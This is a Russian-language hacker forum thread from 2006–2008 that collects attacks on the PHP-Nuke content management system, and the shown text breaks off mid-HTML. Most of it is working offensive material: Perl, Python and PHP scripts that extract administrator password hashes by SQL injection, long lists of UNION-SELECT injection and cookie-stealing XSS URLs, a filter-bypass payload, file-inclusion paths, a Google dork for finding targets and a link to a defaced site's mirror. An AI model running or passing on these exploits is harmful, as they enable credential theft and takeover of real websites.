 if (!defined('ADMIN_FILE')) {      foreach ($_GET as $sec_key => $secvalue) {         
 if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||    
      (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||    
      (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||    
      (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||     
     (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||       
   (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||      
    (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||     
     (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||     
     (eregi("<[^>]*onmouseover*\"?[^>]*>", $secvalue)) ||   
       (eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||       
   (eregi("\"", $secvalue)) ||        
  (eregi("forum_admin", $sec_key)) ||       
   (eregi("inside_mod", $sec_key))) {

тут нет проверки на тэг <image >
атаку можно провести так

Код:

<image src=javascript:alert('ok')>

вводить сюда -> Ваш аккаунт - Персональная информация - Немного о себе:

Great · 25.10.2006

<image src=javascript:alert('ok')>

кстати на фаерфоксе не работает почему-то. На осле и опере нормально.
Вывод - фаерфокс рулит

ENFIX · 02.11.2006

PHP-Nuke - SQL Injection
Дата Выпуска: 2006-11-01
Уровень: Умеренно критический
Решение: Неисправленно
Software: PHP-Nuke 7.x

Описание:
Входящие данные в параметре "forwhat" в modules/journal/search.php, должным образом не проверяются, перед использованием в SQL запросе. Уязвимость может эксплуатироваться, чтобы управлять SQL, запросами, вводя произвольный код SQL.

Пример:

Код:

http://www.site.com/modules/journal/search.php?forwhat=CODE

Источник: secunia.com

GZip · 04.11.2006

SQL-инъекция в PHP-Nuke
Программа: PHP-Nuke 7.9, возможно более ранние версии
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "forwhat" в сценарии modules/journal/search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

Код:

http://victim/moblog/big.php?img=[SQL]&pg=1

URL производителя: www.phpnuke.org
Решение: Способов устранения уязвимости не существует в настоящее время.

KodRed · 10.11.2006

за всеми этими событиями совершенно незаметным остался дефейс сайта PHP-NUKE.RU
http://taxidermia.void.ru/mirrors/2006/11/02/php-nuke.ru/ - зеркало

GZip · 30.11.2006

Программа: PHP-Nuke 7.9, возможно более ранние версии
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "sid" в сценарии modules/News/index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для удачной эксплуатации уязвимости опция "magic_quotes_gpc" должна быть отключена в конфигурационном файле PHP.
URL производителя: www.phpnuke.org
Решение: Способов устранения уязвимости не существует в настоящее время.
Источник: http://www.securitylab.ru/bitrix/redirect....ce%2F279125.php

AKella · 08.03.2008

Программа: Kütüb-i Sitte (модуль к PHP-Nuke 1.1), возможно более ранние версии

Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "kid" в установочном сценарии modules.php (когда параметр "name" установлен в значение "KutubiSitte" и параметр "h_op" равен "hadisgoster"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

URL производителя: www.ipek-yolu.com/modules.php?name=Downloads&d_op=viewdownload&cid=2

Решение: Способов устранения уязвимости не существует в настоящее время.

AKella · 30.03.2008

PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection Exploit

Код:

#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id     name     username     user_email     femail     user_website     user_avatar     user_regdate     user_icq     user_occ     user_from     user_interests     user_sig     user_viewemail     user_theme     user_aim     user_yim     user_msnm     user_password     storynum     umode     uorder     thold     noscore     bio     ublockon     ublock     theme     commentmax     counter     newsletter     user_posts     user_attachsig     user_rank     user_level     broadcast     popmeson     user_active     user_session_time     user_session_page     user_lastvisit     user_timezone     user_style     user_lang     user_dateformatuser_new_privmsg     user_unread_privmsg     user_last_privmsg     user_emailtime     user_allowhtml     user_allowbbcode     user_allowsmile     user_allowavatar     user_allow_pm     user_allow_viewonline     user_notify     user_notify_pm     user_popup_pm     user_avatar_type     user_sig_bbcode_uid user_actkey     user_newpasswd     last_ip     user_color_gc     user_color_gi     user_quickreply     user_allow_arcadepm     kick_ban     user_wordwrap     agreedtos     user_view_log     user_effects     user_privs     user_custitle     user_specmsg     user_items     user_trade     points     user_cash     last_seen_blocker     user_login_tries     user_last_login_try     user_gender     user_birthday     user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach  (@ARGV) {
    $a++;
    while (($k, $v) = each(%cm_n_)) {
        if ($_ eq $k) {
            ${$v} = $ARGV[$a];
        }
    }
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
    $url = shift;
    $reg = shift;


    $ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;

    if ($content=~m/$reg/) {
        ($f,$s,$l) = split(">>",$1);
        $s =~s/ Post //;
        print $column.":".$s."\n";
    }
}

aka яП · 13.07.2008

PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab

Код:

#!/usr/bin/python
#=================================================================================================#
#                                    This is a Priv8 Exploit.                                     #
#                                  Date: 23/02/2008 [dd,mm,yyyy]                                  #
#                                                                                                 #
#=================================================================================================#
#                 PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2            #
#                                    Response Analisys Method                                     #
#                                                                                                 #
#                                       Vendor:   http://www.phpnuke.org                          #
#                                     Severity:   Highest                                         #
#                                       Author:   The:Paradox                                     #
#=================================================================================================#                                                                                                 
#              Server configuration requirments:                                                  #
#                magic_quotes_gpc = 0                                                             #   
#=================================================================================================#                                                                                                 
#                                       Proud To Be Italian.                                      #
#=================================================================================================#
"""                                                                                               
                                            Related Codes:
                    mainfile.php; line 89;

if (!ini_get('register_globals')) {
   @import_request_variables("GPC", "");
}
              /Your_Account/index.php; line 1700;
switch($op) {
//   [..]
   case "activate":
   activate($username, $check_num);
   break;
//   [..]   
   }
                                  /Your_Account/index.php; line 161:

function activate($username, $check_num) {
   global $db, $user_prefix, $module_name, $language, $prefix;
   $username = filter($username, "nohtml", 1);
   $past = time()-86400;
   $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
   $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
   echo $sql;   
   $result = $db->sql_query($sql);

"""
#=================================================================================================#
# Proof Of Concept / Bug Explanation:                                                             #
#                                                                                                 #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable.       #
# Byte null bypasses all query string check.                                                      #
#                                                                                                 #
#=================================================================================================#
# Google Dork=> Powered by PHPNuke                                                        #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds.                              #
#=================================================================================================#
#                                      Python Exploit Starts                                      #
#=================================================================================================#
import httplib, sys, time
print "\n#=========================================================#"
print "             PHPNuke <= 8.0 And Maybe Higher             "
print "          Blind Sql Injection Vulnerability Mq=0         "
print "                Response Analisys Method                 "
print "                                                         "
print "                Discovered By The:Paradox                "         
print "                                                         "
print " Usage:                                                  "
print " python %s [Target] [Path] [UsernameUnveryfied]          " % (sys.argv[0])
print "                                                         "   
print " Example:                                                "         
print " python %s 127.0.0.1 /Nuke/ Abdullah                     " % (sys.argv[0])
print " python %s www.host.com / Andrea                         " % (sys.argv[0])   
print "                                                         "   
print "                                                         "     
print "#=========================================================#\n"
if len(sys.argv)<=3:   sys.exit()
else:   print "[.]Exploit Starting."


target = sys.argv[1]
path = sys.argv[2]


prefix = "nuke_"
port = "80"


j=1
h4sh = ""
md5tuple = []

for k in range(48,58):  md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103): md5tuple.append(k)
md5tuple.append('END')

# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'   
#

print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
   for i in md5tuple:
      if i == 'END':   sys.exit('[-]Exploit Failed.\n')

      conn = httplib.HTTPConnection(target,port)
      conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})

      response = conn.getresponse()

      time.sleep(0.5)     
      if response.status == 404: sys.exit('[-]Error 404. Not Found.')     
      if response.read().find("New user verification number is invalid.") != -1:
         sys.stdout.write(chr(i))
         sys.stdout.flush()
         h4sh += chr(i)
         j += 1
         break;

print "\n\n[+]All Done.\n-=Paradoxe=-"

Взято из h4cky0u.org

aka яП · 19.07.2008

Баги в верси php-nuke 8,0

XSS
nuke.com/modules.php?name=Encyclopedia&file=search&eid=1%00"><script>alert()</script>
XSS
http://nuke/modules.php?name=Your_Account&op=logout
POST: redirect=1%00"><script>alert()</script>
SQL-Inj (POC)
http://nuke/admin.php
POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login

Взято из antichat.ru .......

baltazar · 14.10.2008

XSS

Код:

modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>bar
modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
modules.php?name=Reviews&rop=postcomment&title=%253csc ript>alert%2528document.cookie);%253c/script>
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337>
modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script><
modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=
modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>
modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=
modules.php?name=Journal&file=friend&jid=2&yun=
modules.php?name=Journal&file=friend&jid=2&ye=
modules.php?name=Journal&file=add&filelist[]=
modules.php?name=Journal&file=modify&filelist[]=
modules.php?name=Journal&file=delete&jid=&forwhat=waraxe
modules.php?name=Journal&file=comment&onwhat=
modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=
modules.php?name=Encyclopedia&op=terms&eid=1&ltr=
modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=
modules.php?name=Encyclopedia&file=search&eid=
modules.php?name=Encyclopedia&file=search&query=f00bar&eid=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&url_title=foobar&url=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&cover=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&rlanguage=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&hits=
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&reviewer=
modules.php?name=Reviews&rop=savecomment&uname=&id=8&score=9
modules.php?name=News&file=article&sid=1&optionbox=
modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=
modules.php?name=Stories_Archive&sa=show_month&year=&month=05&month_l=May
modules.php?name=Stories_Archive&sa=show_month&year=2004&month=&month_l=May
modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=&order=0&thold=0
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=0
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=
modules.php?name=NukeJokes&func=CatView&cat=
modules.php?name=NukeJokes&func=JokeView&jokeid=
modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=
modules.php?name=Downloads&d_op=viewsdownload&sid=
modules.php?name=Search&sid=
modules.php?name=Search&query=*&max=
modules.php?name=Search&query=waraxe&sel1=[xss]&type=comments
modules.php?name=Search&a=6&query=*&match=
modules.php?name=Search&query=*&mod3=
modules.php?name=Calendar&file=submit&type=
modules.php?name=Calendar&file=submit&op2=Preview&day=
modules.php?name=Calendar&file=submit&op2=Preview&month=
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query]
modules.php?name=NukeJokes&func=CatView&cat=[xss code here]
modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here]
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=users&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=comments&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=stories&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=reviews&category=2
modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS]
banners.php?op=EmailStats&login=[our_login]&cid=1&bid=
modules.php?name=Encyclopedia&file=index&op=terms&eid=1&ltr=

PHP:

 <html>
<form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index>
<input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
<input type=submit name=sub>
<script>document.searchform.sub.click()</script>
</html>

SQL injection:

Код:

modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,p  wd,url,url,10000,name%20FROM%20nuke_authors/*
modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_a  uthors
modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors  
modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_aut  hors%20WHERE%201/*
modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user  _id%20FROM%20nuke_users
modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_passwor  d,1%20FROM%20nuke_users/*
modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_u  sers%20WHERE%20user_id=5
modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_u  sers%20WHERE%20user_id=5
modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_passw  ord,name,user_email,user_level,0,0%20FROM%20nuke_u  sers
modules.php?name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_passwor  d%20FROM%20nuke_users/*
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_  authors
modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_aut  hors/*
modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20n  uke_authors
modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_autho  rs
modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_autho  rs%20LIMIT%201,2
modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1

Уязвимости в скриптах autohtml.php и autohtml0.php в параметре filename.

[Local File Inclusion]

PHP:

http://site/autohtml.php?filename=../file.php 

[url=http://site/autohtml0.php?filename=../file.php]http://site/autohtml0.php?filename=../file.php[/url]

[Information Leakage]

Код:

http://site/autohtml.php?filename=../.htaccess 

http://site/autohtml0.php?filename=../.htaccess

[Full path disclosure]

Код:

http://site/autohtml.php?filename=12345

PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

Код:

/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2

PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability

Код:

modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%  2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu  ke_authors

Код:

modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%  2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_a  uthors

hp Nuke "Sell" module SQL Injection ("cid")

Код:

modules.php?name=Sell&d_op=viewsell&cid=-
9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,
aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability

Код:

modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

PHP-Nuke KutubiSitte "kid" SQL Injection

Код:

#!/usr/bin/perl 
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("


   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
   |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
  ##################################################  #####
  # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
  ##################################################  #####
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:  #:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                           |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:  #:#:#:#:#
#:-------------------------------------------------------:#
:#|                   EXAMPLE:                          |#:
:#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:  #:#:#:#:#


");
}
sub problem{
    print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
    exit();
}
sub exploitation{
    
    $conn = LWP::UserAgent -> new;
    $conn->agent('Checkbot/0.4 ');
    $query_pwd =
$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%  2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_auth  ors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
    $return_pwd = $conn->get($query_pwd) || problem();
    $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
    print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
   }

getopts(":h:p:U:",\%args);
     $host = $args{h} if (defined $args{h});
     $path = $args{p} if (defined $args{p});
     $user_id= $args{U}if (defined $args{U});
     
     if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
        usg();
     }
     else{
        exploitation();
     }

PHP-Nuke SQL injection Module "Hadith" [cat]

Код:

modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%  2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2  A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%  2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2  A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

PHP-Nuke Module NukeC30 sql injection

Код:

http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),
2/**/from/**/nuke_authors/*where%20admin%20-2

PHP-Nuke Module ZClassifieds [cat] SQL Injection

Код:

modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,
aid/**/from/**/nuke_authors/*where%20admin1/**

PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection

Код:

#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id  name  username  user_email  femail  user_website  user_avatar  user_regdate  user_icq  user_occ  user_from  user_interests  user_sig  user_viewemail  user_theme  user_aim  user_yim  user_msnm  user_password  storynum  umode  uorder  thold  noscore  bio  ublockon  ublock  theme  commentmax  counter  newsletter  user_posts  user_attachsig  user_rank  user_level  broadcast  popmeson  user_active  user_session_time  user_session_page  user_lastvisit  user_timezone  user_style  user_lang  user_dateformatuser_new_privmsg  user_unread_privmsg  user_last_privmsg  user_emailtime  user_allowhtml  user_allowbbcode  user_allowsmile  user_allowavatar  user_allow_pm  user_allow_viewonline  user_notify  user_notify_pm  user_popup_pm  user_avatar_type  user_sig_bbcode_uid user_actkey  user_newpasswd  last_ip  user_color_gc  user_color_gi  user_quickreply  user_allow_arcadepm  kick_ban  user_wordwrap  agreedtos  user_view_log  user_effects  user_privs  user_custitle  user_specmsg  user_items  user_trade  points  user_cash  last_seen_blocker  user_login_tries  user_last_login_try  user_gender  user_birthday  user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach  (@ARGV) {
	$a++;
	while (($k, $v) = each(%cm_n_)) {
  if ($_ eq $k) {
  	${$v} = $ARGV[$a];
  }
	}
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
	$url = shift;
	$reg = shift;


	$ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;

	if ($content=~m/$reg/) {
     ($f,$s,$l) = split(">>",$1);
     $s =~s/ Post //;
     print $column.":".$s."\n";
	}
}

PHP-Nuke <= 8.0 Final (sid) Remote SQL Injection Exploit

Код:

<?php
##################################################  ########
# UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method -
# the best for version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf
##################################################  ########
# tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
##################################################  ########

if (isset($_POST['Submit'])){
$result=sendit('CONCAT("::",aid,"::",pwd,"::")');
if (preg_match("/::([^:]*)::([a-f0-9]{32})::/",$result, $matches))
{$ahash = $matches[2]; $aname = $matches[1];}

}

function sendit($param){
$prefix = $_POST['prefix'];
$data = $_POST['sql_text'];
$host = $_POST['hostname'];
$page = (isset($_POST['dir'])) ? '/'.$_POST['dir'] : '';
$page .= '/modules.php?name=Search';
$method = $_POST['method'];
$ref_text = $_POST['ref_text'];
$user_agent = $_POST['user_agent'];
$result = '';
$sock = fsockopen($host, 80, $errno, $errstr, 50);
if (!$sock) die("$errstr ($errno)\n");
fputs($sock, "$method /$page HTTP/1.0\r\n");
fputs($sock, "Host: $host" . "\r\n");
fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($sock, "Content-length: " . strlen($data) . "\r\n");
fputs($sock, "Referer: $ref_text". "\r\n");
fputs($sock, "User-Agent: $user_agent" . "\r\n");
fputs($sock, "Accept: */*\r\n");
fputs($sock, "\r\n");
fputs($sock, "$data\r\n");
fputs($sock, "\r\n");

while (!feof($sock)) {
$result .= fgets ($sock,8192);
}
fclose($sock);
return $result;

}


?>

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1251">
<TITLE>RST/GHC PHP Nuk'em exploit</TITLE>
<style>
a:link{color: #000000; text-decoration: none;}
a:visited{color: #000000; text-decoration: none;}
a:hover,a:active{color:#e49a34; text-decoration:underline;}
table{color:#000000;font-family:verdana;font-size:8pt;}
.style2 {
color: #FFFFFF;
font-weight: bold;
}
.style3 {color: #E39930}
.style5 {color: #000000; font-weight: bold; }
</style>
<body bgcolor="#525254">
<form method=post>
<p class="style2"><font size="3" face="Arial, Helvetica, sans-serif">PHP Nuke <span class="style3">QUERY MANIPULATOR</span> based on <font size="3" face="Arial, Helvetica, sans-serif">`sid` POST sql injection</font> exploit for Search module </font></p>
<table width="900" border="0">
<tr bgcolor="#FFFFFF">
<td width="12%"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Parameter</font></strong></td>
<td width="88%" bgcolor="#FFFFFF"><span class="style5"><font size="2" face="Arial, Helvetica, sans-serif">Value</font></span></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">url
</font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input name="hostname" type="text" id="hostname" value="<?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?>">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">dir</font>
</strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input name="dir" type="text" id="dir" value="<?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?>">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">referer</font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input type="text" name="ref_text" value="<?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?>" size="60">
</font></td>
</tr>
<tr>
<td bgcolor="E39930">SQL query</td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input type="text" name="sql_text" value="<?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_  authors%20WHERE%20radminsuper=\'1'; ?>" size="80">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">user
agent</font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
